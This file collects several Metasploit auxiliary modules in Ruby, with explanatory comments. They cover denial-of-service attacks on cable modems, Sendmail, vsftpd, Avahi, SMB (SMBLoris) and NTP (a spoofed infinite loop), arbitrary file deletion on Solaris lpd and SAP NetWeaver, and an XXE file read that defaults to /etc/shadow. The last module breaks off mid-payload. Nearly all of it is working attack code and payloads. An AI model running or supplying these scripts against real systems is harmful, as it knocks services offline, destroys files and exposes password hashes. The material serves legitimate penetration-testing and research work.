##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'eventmachine'
require 'faye/websocket'

# Reachability-based check for the "Cablehaunt" spectrum-analyzer overflow
# (CVE-2019-19494). The module opens the modem's JSON-RPC WebSocket, sends one
# request whose fStartHz parameter is a 7000-8000 byte random string, and then
# infers the outcome purely from whether the HTTP interface still answers.
# Because success is inferred from reachability alone, any unrelated outage
# during the check window is reported as a successful DoS; the module never
# verifies the crash itself. Crashes the modem's web service (CRASH_SERVICE_DOWN)
# and leaves the request in the device log (IOC_IN_LOGS).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options.
  #
  # WS_USERNAME / WS_PASSWORD are only used for the HTTP basic-auth pre-check in
  # #run; the WebSocket client is built directly from RHOST/RPORT (see #run),
  # which is presumably why the Proxies/VHOST/SSL HttpClient options are removed.
  # TIMEOUT is the total EventMachine run time in seconds, not a per-request
  # timeout (see the timer layout in #run).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '"Cablehaunt" Cable Modem WebSocket DoS',
        'Description' => %q{
          There exists a buffer overflow vulnerability in certain
          Cable Modem Spectrum Analyzer interfaces. This overflow
          is exploitable, but since an exploit would differ between
          every make, model, and firmware version (which also
          differs from ISP to ISP), this module simply causes a
          Denial of Service to test if the vulnerability is present.
        },
        'Author' => [
          'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC
          'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC
          'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC
          'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC
          'Nicholas Starke' # msf module
        ],
        'References' => [
          ['CVE', '2019-19494'],
          ['EDB', '47936'],
          ['URL', 'https://cablehaunt.com/'],
          ['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']
        ],
        'DisclosureDate' => '2020-01-07',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RHOST('192.168.100.1'),
        Opt::RPORT(8080),
        OptString.new('WS_USERNAME', [true, 'WebSocket connection basic auth username', 'admin']),
        OptString.new('WS_PASSWORD', [true, 'WebSocket connection basic auth password', 'password']),
        OptInt.new('TIMEOUT', [true, 'Time to wait for response', 15])
      ]
    )

    deregister_options('Proxies')
    deregister_options('VHOST')
    deregister_options('SSL')
  end

  # Runs the check. Flow:
  #   1. HTTP GET / with basic auth, as a reachability and credential check.
  #      Any non-200 status (not only 401) is reported as wrong credentials.
  #   2. Inside an EventMachine reactor, open the WebSocket; 1 s after :open,
  #      send the oversized JSON-RPC request.
  #   3. At t=10 s, GET / again. A nil response OR any StandardError is taken
  #      as "modem down" (@succeeded = true); a real response is a failure.
  #   4. At t=TIMEOUT, stop the reactor and report based on @succeeded.
  # The three timers are independent: if TIMEOUT is set below 10 the status
  # check in step 3 never runs before EventMachine.stop, and the module always
  # ends with 'Unknown failure occurred'. fail_with is called from inside EM
  # callbacks; how the reactor is torn down in that path is not visible here.
  def run
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/',
      'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD'])
    })

    fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil?
    fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 200

    # Set by the t=10 s status check; read by the t=TIMEOUT reporter.
    @succeeded = false
    EM.run do
      print_status("Attempting Connection to #{datastore['RHOST']}")

      # Plain ws:// built from RHOST/RPORT; the 'rpc-frontend' subprotocol is
      # what the modem's Frontend endpoint is expected to negotiate.
      driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend'])

      driver.on :open do
        print_status('Opened connection')

        # One request, sent 1 s after the socket opens. The block-level rescue
        # (Ruby 2.6+ syntax) covers both the random-text generation and send.
        EM::Timer.new(1) do
          print_status('Sending payload')
          payload = Rex::Text.rand_text_alphanumeric(7000..8000)
          driver.send({
            jsonrpc: '2.0',
            method: 'Frontend::GetFrontendSpectrumData',
            params: {
              coreID: 0,
              fStartHz: payload,
              fStopHz: 1000000000,
              fftSize: 1024,
              gain: 1
            },
            id: '0'
          }.to_json)
        rescue StandardError
          fail_with(Failure::Unreachable, 'Could not establish websocket connection')
        end
      end

      # Status probe. Note the asymmetry: a nil response and *any* StandardError
      # both count as success, so a transient client-side error here produces a
      # false positive; only an actual HTTP reply is treated as "still up".
      EM::Timer.new(10) do
        print_status('Checking Modem Status')
        begin
          res = send_request_cgi({
            'method' => 'GET',
            'uri' => '/'
          })

          if res.nil?
            @succeeded = true
            print_status('Cable Modem unreachable')
          else
            fail_with(Failure::Unknown, 'Host still reachable')
          end
        rescue StandardError
          @succeeded = true
          print_status('Cable Modem unreachable')
        end
      end

      # Final reporter; also the only thing that stops the reactor.
      EM::Timer.new(datastore['TIMEOUT']) do
        EventMachine.stop
        if @succeeded
          print_good('Exploit delivered and cable modem unreachable.')
        else
          fail_with(Failure::Unknown, 'Unknown failure occurred')
        end
      end
    end
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Proof-of-concept DoS for the Sendmail prescan() address-parsing flaw
# (CVE-2003-0694, Sendmail <= 8.12.8). After EHLO and MAIL FROM, a single
# RCPT TO is sent whose address is a long "A"/";" pattern followed by 28
# "\x5c\xff" pairs. The only signal the module uses is an EOFError on the
# SMTP socket afterwards, which it reports as "target vulnerable".
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Smtp
  include Msf::Auxiliary::Dos

  # Module metadata. MAILFROM (used in #run) is provided by the Smtp mixin.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Sendmail SMTP Address prescan Memory Corruption',
      'Description' => %q{
        This is a proof of concept denial of service module for Sendmail versions
        8.12.8 and earlier. The vulnerability is within the prescan() method when
        parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00
        bytes can be used, limiting the likelihood for arbitrary code execution.
      },
      'Author' => [ 'aushack' ],
      'References' =>
        [
          [ 'OSVDB', '2577' ],
          [ 'CVE', '2003-0694' ],
          [ 'BID', '8641' ],
          [ 'EDB', '24' ]
        ],
      'DisclosureDate' => '2003-09-17'))
  end

  # Sends the trigger and interprets the socket outcome.
  #
  # Interpretation caveat: only EOFError is taken as evidence of a crash. Any
  # other reason the server closes the connection (policy rejection, rate
  # limiting, a proxy in front of the MTA) produces the same "target vulnerable"
  # message, so confirm on the target side (process/core/log) before concluding.
  # Connection-level failures print a status line and return normally.
  def run
    begin
      connect
      # we use connect instead of connect_login,
      # because we send our own malicious RCPT.
      # however we want to make use of MAILFROM
      # and raw_send_recv()
      #select(nil,nil,nil,23) # so we can attach gdb to the child PID

      # 4 x (255 'A' + ';'), then 217 'A' + ';', then 28 x "\x5c\xff".
      sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28

      raw_send_recv("EHLO X\r\n")
      raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")
      print_status("Sending DoS packet.")
      raw_send_recv("RCPT TO: #{sploit}\r\n")

      disconnect
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_status("Couldn't connect to #{rhost}:#{rport}")
    rescue ::EOFError
      print_status("Sendmail stopped responding after sending trigger - target vulnerable.")
    end

  end
end

# gdb backtrace recorded by the author on a vulnerable build, kept as
# documentation of the crash. Frame #2 (0x5c5c5c5c) is made of the 0x5c bytes
# from the RCPT payload, which is what the description refers to.
=begin
Program received signal SIGSEGV, Segmentation fault.
0x8073499 in ?? ()
(gdb) bt
#0 0x807e499 in ?? ()
#1 0x087e125 in ?? ()
#2 0x5c5c5c5c in ?? ()
Error accessing memory address 0x5c5c5c5c: Bad address.
=end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# DoS for vsftpd < 2.3.3 (CVE-2011-0762): after a version check via STAT, the
# module repeatedly logs in and sends a STAT command with a deeply nested
# glob pattern until the server closes the stream (EOFError).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  # Module metadata. Credentials/host/port options come from the Ftp mixin.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VSFTPD 2.3.2 Denial of Service',
        'Description' => %q{
          This module triggers a Denial of Service condition in the VSFTPD server in
          versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.
        },
        'Author' => [
          'Nick Cottrell (Rad10Logic) <ncottrellweb[at]gmail.com>', # Module Creator
          'Anna Graterol <annagraterol95[at]gmail.com>', # Vuln researcher
          'Mana Mostaani <mana.mostaani[at]gmail.com>',
          'Maksymilian Arciemowicz' # Original EDB PoC
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '46617' ],
          [ 'CVE', '2011-0762' ],
          [ 'EDB', '16270' ]
        ],
        'DisclosureDate' => '2011-02-03',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
  end

  # Version-based vulnerability check.
  #
  # Logs in, issues STAT until a line containing `vsFTPd x.y.z` or the
  # `211 End of status` terminator is seen, disconnects, then compares the
  # parsed version with 2.3.3.
  #
  # @return [Exploit::CheckCode] Unknown when the connection/login fails or no
  #   version line is found; Appears when version < 2.3.3; Safe otherwise.
  #
  # Notes: a failed `connect_login` is reported as 'Connection refused.' even
  # though it is a login failure. The `loop` below has no iteration bound; it
  # relies on send_cmd eventually returning one of the two marker lines
  # (send_cmd's behaviour is not visible here — confirm it cannot block forever).
  def check
    # attempt to connect
    begin
      if !connect_login
        print_error('Connection refused.')
        return Exploit::CheckCode::Unknown
      end
    rescue Rex::ConnectionRefused
      print_error('Connection refused.')
      return Exploit::CheckCode::Unknown
    rescue Rex::ConnectionTimeout
      print_error('Connection timed out')
      return Exploit::CheckCode::Unknown
    end
    s = ''
    loop do
      # get each line until our desired line shows or end line shows
      s = send_cmd(['STAT'], true)
      break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")
    end
    disconnect
    # check if version was found
    if s !~ /vsFTPd \d+\.\d+\.\d+/
      print_error('Did not find ftp version in FTP session.')
      return Exploit::CheckCode::Unknown
    end

    # pull out version and check if its in range of vulnerability
    version = s[/\d+\.\d+\.\d+/]
    if Rex::Version.new(version) < Rex::Version.new('2.3.3')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Sends the trigger until the server stops responding.
  #
  # Refuses to run unless #check returns Appears. Each iteration logs in, sends
  # the payload 10 times without waiting for a reply and once more waiting for
  # one, then disconnects. Exit condition: only EOFError breaks the loop.
  # ConnectionRefused prints a success message but does NOT break, so the loop
  # keeps reconnecting until EOF or the operator interrupts the module.
  def run
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if check != Exploit::CheckCode::Appears

    # 487 nested '{{*},' groups, a '{.}' core, and 487 closing braces.
    payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487

    vprint_status("Payload being sent: #{payload}")
    print_status('sending payload')

    loop do
      print('.')
      connect_login
      10.times do
        send_cmd([payload.to_s], false)
      end
      send_cmd([payload.to_s], true)
      disconnect
    rescue Rex::ConnectionTimeout
      print("\n")
      print_error('Connection timeout! Sending again')
    rescue Errno::ECONNRESET
      print("\n")
      print_error('Connection reset!')
    rescue Rex::ConnectionRefused
      print("\n")
      print_good('Connection refused! Appears DOS attack succeeded.')
    rescue EOFError
      print("\n")
      print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')
      break
    end
    disconnect
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Solaris lpd arbitrary file deletion (CVE-2005-4797). Speaks the LPR
# job-submission protocol on port 515: requests a receive-job, uploads a
# control file whose 'U' record names RPATH behind ten "../" segments, then
# uploads a throwaway data file. Only the daemon's protocol ACKs are checked;
# the module never confirms that the file was actually removed.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Module metadata and the single extra option, RPATH (remote path to delete).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Solaris LPD Arbitrary File Delete',
      'Description' => %q{
        This module uses a vulnerability in the Solaris line printer
        daemon to delete arbitrary files on an affected system. This
        can be used to exploit the rpc.walld format string flaw, the
        missing krb5.conf authentication bypass, or simply delete
        system files. Tested on Solaris 2.6, 7, 8, 9, and 10.

      },
      'Author' => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2005-4797' ],
          [ 'BID', '14510' ],
          [ 'OSVDB', '18650' ]
        ]
      ))

    register_options(
      [
        Opt::RPORT(515),
        OptString.new('RPATH', [ true, "The remote file path to delete"]),
      ])
  end

  # Drives one LPR session.
  #
  # Steps: random host/user/spool names; control file with H (host) and P
  # (user) records; job id from the PID and current time; "\x02host:spool\n"
  # receive-job request; append the 'U' record for RPATH; upload the control
  # file (type 2, cfA...) and a data file (type 3, dfa...) via #send_file.
  #
  # Result reporting: 'Successfully deleted' is printed as soon as both uploads
  # were ACKed by the daemon. There is no verification step, so treat the
  # message as "the daemon accepted the job", not as proof of deletion.
  def run


    r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
    r_user = Rex::Text.rand_text_alpha(rand(8)+1)
    r_spool = Rex::Text.rand_text_alpha(rand(8)+1)

    # Create a simple control file...
    control = "H#{r_hostname}\nP#{r_user}\n";

    # The job ID is squashed down to three decimal digits
    jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]

    # Establish the first connection to the server
    sock1 = connect(false)

    # Request a cascaded job
    sock1.put("\x02#{r_hostname}:#{r_spool}\n")
    res = sock1.get_once
    if (not res)
      print_status("The target did not accept our job request command")
      return
    end

    # Theoretically, we could delete multiple files at once, however
    # the lp daemon will append garbage from memory to the path name
    # if we don't stick a null byte after the path. Unfortunately, this
    # null byte will prevent the parser from processing the other paths.
    control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"

    dataf = Rex::Text.rand_text_alpha(100)+1

    print_status("Deleting #{datastore['RPATH']}...")
    # `and` short-circuits: the data file is only sent if the control file
    # was accepted. A nil from either #send_file aborts here.
    if !(
      send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
      send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)
    )
      sock1.close
      return
    end

    print_good("Successfully deleted #{datastore['RPATH']} >:-]")
    sock1.close
  end

  # Uploads one LPR sub-file over an already-open receive-job session.
  #
  # @param s    [Rex::Socket] the connected lpd socket
  # @param type [Integer] sub-command byte (2 = control file, 3 = data file)
  # @param name [String] file name sent to the daemon
  # @param data [String] file contents
  # @return [true, nil] true when both the command and the data were ACKed
  #   with a single 0x00 byte; nil (bare `return`) otherwise.
  #
  # Wire sequence: "<type><length> <name>\n" -> 1-byte ACK -> data -> "\x00"
  # -> 1-byte ACK. Each ACK is read with get_once(1) and compared to "\0".
  def send_file(s, type, name, data='')

    s.put(type.chr + data.length.to_s + " " + name + "\n")
    res = s.get_once(1)
    if !(res and res[0] == ?\0)
      print_status("The target did not accept our control file command (#{name})")
      return
    end

    s.put(data)
    s.put("\x00")
    res = s.get_once(1)
    if !(res and res[0] == ?\0)
      print_status("The target did not accept our control file data (#{name})")
      return
    end

    print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))
    return true
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

##
# This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php.
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy.
#
# The following guys from ERP-SCAN deserve credit for their contributions -
# Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and
# Dmitry Evdokimov.
#
# I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis
# who have Beta tested the modules and provided excellent feedback. Some people
# just seem to enjoy hacking SAP :)
##

# Calls the SAP NetWeaver EPS_DELETE_FILE RFC function through the SOAP RFC
# service (/sap/bc/soap/rfc) with HTTP basic auth, asking it to delete
# DIRNAME/FILENAME on the application server. Authenticated (the default
# credentials are the well-known SAP* ones) and host-scanner based.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Module metadata and options (SAP client, credentials, target path).
  def initialize
    super(
      'Name' => 'SAP SOAP EPS_DELETE_FILE File Deletion',
      'Description' => %q{
        This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP
        RFC Service, to delete arbitrary files on the remote file system. The module can
        also be used to capture SMB hashes by using a fake SMB share as DIRNAME.
      },
      'References' => [
        [ 'OSVDB', '74780' ],
        [ 'URL', 'http://dsecrg.com/pages/vul/show.php?id=331' ],
        [ 'URL', 'https://launchpad.support.sap.com/#/notes/1554030' ]
      ],
      'Author' =>
        [
          'Alexey Sintsov', # Vulnerability discovery
          'nmonkee' # Metasploit module
        ],
      'License' => MSF_LICENSE
    )

    register_options([
      Opt::RPORT(8000),
      OptString.new('CLIENT', [true, 'SAP Client', '001']),
      OptString.new('HttpUsername', [true, 'Username', 'SAP*']),
      OptString.new('HttpPassword', [true, 'Password', '06071992']),
      OptString.new('DIRNAME', [true, 'Directory Path which contains the file to delete', '/tmp']),
      OptString.new('FILENAME', [true, 'Filename to delete', 'msf.txt'])
    ])
  end

  # Sends one EPS_DELETE_FILE SOAP request to +ip+ and reports the outcome.
  #
  # The envelope is built by plain string concatenation and DIRNAME/FILENAME
  # are inserted without XML escaping, so option values containing `<`, `&`
  # or `"` produce a malformed request rather than being quoted.
  # Success criterion: HTTP 200, body matching /EPS_DELETE_FILE.Response/,
  # and both option values echoed in the body. Any other response is only
  # shown with -v (vprint_error); connection errors print and return.
  def run_host(ip)
    data = '<?xml version="1.0" encoding="utf-8" ?>'
    data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '
    data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '
    data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'
    data << '<SOAP-ENV:Header/>'
    data << '<SOAP-ENV:Body>'
    data << '<EPS_DELETE_FILE xmlns="urn:sap-com:document:sap:rfc:functions">'
    data << '<DIR_NAME>' + datastore['DIRNAME'] + '</DIR_NAME>'
    data << '<FILE_NAME>' + datastore['FILENAME'] + '</FILE_NAME>'
    data << '<IV_LONG_DIR_NAME></IV_LONG_DIR_NAME>'
    data << '<IV_LONG_FILE_NAME></IV_LONG_FILE_NAME>'
    data << '</EPS_DELETE_FILE>'
    data << '</SOAP-ENV:Body>'
    data << '</SOAP-ENV:Envelope>'

    begin
      vprint_status("#{rhost}:#{rport} - Sending request to delete #{datastore['FILENAME']} at #{datastore['DIRNAME']}")
      # sap-client is passed both in the cookie and as a query parameter.
      res = send_request_cgi({
        'uri' => '/sap/bc/soap/rfc',
        'method' => 'POST',
        'data' => data,
        'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),
        'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
        'ctype' => 'text/xml; charset=UTF-8',
        'headers' => {
          'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
        },
        'vars_get' => {
          'sap-client' => datastore['CLIENT'],
          'sap-language' => 'EN'
        }
      })

      if res and res.code == 200 and res.body =~ /EPS_DELETE_FILE.Response/ and res.body.include?(datastore['FILENAME']) and res.body.include?(datastore['DIRNAME'])
        print_good("#{rhost}:#{rport} - File #{datastore['FILENAME']} at #{datastore['DIRNAME']} successfully deleted")
      elsif res
        vprint_error("#{rhost}:#{rport} - Response code: " + res.code.to_s)
        vprint_error("#{rhost}:#{rport} - Response message: " + res.message.to_s)
        vprint_error("#{rhost}:#{rport} - Response body: " + res.body.to_s) if res.body
      end
    rescue ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - Unable to connect")
      return
    end
  end
end
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Capture<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize<br /> super(<br /> 'Name' => 'Avahi Source Port 0 DoS',<br /> 'Description' => %q{<br /> Avahi-daemon versions prior to 0.6.24 can be DoS'd<br /> with an mDNS packet with a source port of 0.<br /> },<br /> 'Author' => 'kris katterjohn',<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'CVE', '2008-5081' ],<br /> [ 'OSVDB', '50929' ],<br /> ],<br /> 'DisclosureDate' => 'Nov 14 2008')<br /><br /> register_options([<br /> OptInt.new('RPORT', [true, 'The destination port', 5353])<br /> ])<br /><br /> deregister_options('FILTER','PCAPFILE')<br /> end<br /><br /> def run<br /> open_pcap<br /><br /> print_status("Sending to #{rhost}")<br /><br /> p = PacketFu::UDPPacket.new<br /> p.ip_saddr = "0.0.0.0"<br /> p.ip_daddr = rhost<br /> p.ip_frag = 0x4000 # Original had ip frag flags set to 2 for some reason.<br /> p.udp_sport = 0 # That's the bug<br /> p.udp_dport = datastore['RPORT'].to_i<br /> p.payload = Rex::Text.rand_text(rand(0x20)) # UDP needs at least one data byte, may as well send a few.<br /> p.recalc<br /> capture_sendto(p, rhost) and print_status("Avahi should be down now")<br /> close_pcap<br /> end<br />end<br /></code></pre>
#!/usr/bin/env ruby

require 'socket'
require 'metasploit'

require 'bindata'

# NetBIOS Session Service header as modelled by this script: one type byte,
# 7 flag bits and a 17-bit length, little-endian per BinData.
# NOTE(review): bit-field ordering under `endian :little` is BinData-specific;
# confirm the emitted 4 bytes against a packet capture before relying on the
# layout (only `message_length` is set below).
class NbssHeader < BinData::Record
  endian :little
  uint8 :message_type
  bit7 :flags
  bit17 :message_length
end

# External-module metadata consumed by Metasploit.run below.
metadata = {
  name: 'SMBLoris NBSS Denial of Service',
  description: %q{
    The SMBLoris attack consumes large chunks of memory in the target by sending
    SMB requests with the NetBios Session Service(NBSS) Length Header value set
    to the maximum possible value. By keeping these connections open and initiating
    large numbers of these sessions, the memory does not get freed, and the server
    grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
    and Zach Harding.

    DISCALIMER: This module opens a lot of simultaneous connections. Please check
    your system's ULIMIT to make sure it can handle it. This module will also run
    continuously until stopped.
  },
  authors: [
    'thelightcosine',
    'Adam Cammack <adam_cammack[at]rapid7.com>'
  ],
  date: '2017-06-29',
  references: [
    { type: 'url', ref: 'https://web.archive.org/web/20170804072329/https://smbloris.com/' },
    { type: 'aka', ref: 'SMBLoris'}
  ],
  type: 'dos',
  options: {
    rhost: {type: 'address', description: 'The target address', required: true, default: nil},
    rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},
  }
}

# Entry point called by Metasploit.run with the parsed options.
#
# Opens TCP connections to rhost:rport in an unbounded loop, writes one NBSS
# header with message_length = 0x01FFFF on each, and keeps the sockets alive
# (SO_KEEPALIVE, TCP keepalive count/interval, 60 s linger). Closed sockets
# are pruned at the top of every iteration. Progress is logged every 100
# iterations while the count is changing, every 1000 once it is steady.
#
# @param args [Hash] :rhost (address), :rport (port)
#
# Error handling, as written:
#   * Interrupt -> `break`; the `sockets.each &:close` after it is unreachable,
#     so open sockets are not closed explicitly on Ctrl-C.
#   * Errno::EMFILE -> warn once, then close the oldest socket. `slice(0)`
#     returns that socket without removing it; the next iteration's
#     `delete_if` drops it once `closed?` is true.
#   * `rescue Exception` also swallows SystemExit/NoMemoryError; only
#     Interrupt is excluded by being matched first.
# Detection note: from the server side this looks like many idle TCP
# sessions from one source, each having sent exactly one 4-byte NBSS header.
def run(args)
  header = NbssHeader.new
  header.message_length = 0x01FFFF

  last_reported = 0
  warned = false
  n_loops = 0
  sockets = []

  target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)

  Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "

  while true do
    begin
      sockets.delete_if do |s|
        s.closed?
      end

      nsock = target.connect(timeout: 360)
      nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)
      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))
      nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))
      nsock.setsockopt(Socket::Option.linger(true, 60))
      nsock.write(header.to_binary_s)
      sockets << nsock

      n_loops += 1
      if last_reported != sockets.length
        if n_loops % 100 == 0
          last_reported = sockets.length
          Metasploit.log "#{sockets.length} socket(s) open", level: 'info'
        end
      elsif n_loops % 1000 == 0
        Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'
      end
    rescue Interrupt
      break
      sockets.each &:close # unreachable: `break` above leaves the rescue clause first
    rescue Errno::EMFILE
      Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned
      warned = true
      sockets.slice(0).close
    rescue Exception => e
      Metasploit.log "Exception sending packet: #{e.message}", level: 'error'
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  Metasploit.run(metadata, method(:run))
end
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Capture<br /> include Msf::Auxiliary::Scanner<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'NTP.org ntpd Reserved Mode Denial of Service',<br /> 'Description' => %q{<br /> This module exploits a denial of service vulnerability<br /> within the NTP (network time protocol) demon. By sending<br /> a single packet to a vulnerable ntpd server (Victim A),<br /> spoofed from the IP address of another vulnerable ntpd server<br /> (Victim B), both victims will enter an infinite response loop.<br /> Note, unless you control the spoofed source host or the real<br /> remote host(s), you will not be able to halt the DoS condition<br /> once begun!<br /> },<br /> 'Author' => [ 'todb' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'BID', '37255' ],<br /> [ 'CVE', '2009-3563' ],<br /> [ 'OSVDB', '60847' ],<br /> [ 'URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331' ]<br /> ],<br /> 'DisclosureDate' => '2009-10-04'))<br /><br /> register_options(<br /> [<br /> OptAddressLocal.new('LHOST', [true, "The spoofed address of a vulnerable ntpd server" ])<br /> ])<br /> deregister_options('FILTER','PCAPFILE')<br /><br /> end<br /><br /> def run_host(ip)<br /> open_pcap<br /><br /> print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")<br /><br /> p = PacketFu::UDPPacket.new<br /> p.ip_saddr = datastore['LHOST']<br /> p.ip_daddr = ip<br /> p.ip_ttl = 255<br /> p.udp_src = 123<br /> p.udp_dst = 123<br /> p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]<br /> p.recalc<br /> capture_sendto(p,ip)<br /><br /> close_pcap<br /> end<br />end<br /></code></pre>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated XXE file read in EMC CTA v10.0 (CVE-2014-0644). A login
# request carrying a DTD with an external entity pointing at
# file://FILEPATH is POSTed to /api/login; the server's error message
# (`For input string: "..."`) echoes the resolved entity, which is extracted
# and stored as loot. Defensive fix on the server side is to disable DTD /
# external entity resolution in the XML parser.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Module metadata and options. SSL defaults to true on port 443.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
      'Description' => %q{
        EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
        that allows an attacker to read arbitrary files from the file system
        with the permissions of the root user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
        ],
      'References' =>
        [
          ['CVE', '2014-0644'],
          ['EDB', '32623']
        ],
      'DisclosureDate' => '2014-03-31'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [ true, "Base directory path", '/']),
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),
      ]
    )
  end

  # Sends the XXE login request and stores the echoed file content.
  #
  # The DOCTYPE, element and entity names are randomised per run. Success
  # requires a response body containing `For input string: "..."`; the
  # capture group is what gets saved. Note `file.length < 2` on a MatchData
  # with one capture group is always false once the match succeeded, so only
  # the nil check is effective there. Raises via fail_with on a missing
  # response or a non-matching body.
  def run

    doctype = Rex::Text.rand_text_alpha(6)
    element = Rex::Text.rand_text_alpha(6)
    entity = Rex::Text.rand_text_alpha(6)

    pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE #{doctype} [
<!ELEMENT #{element} ANY >
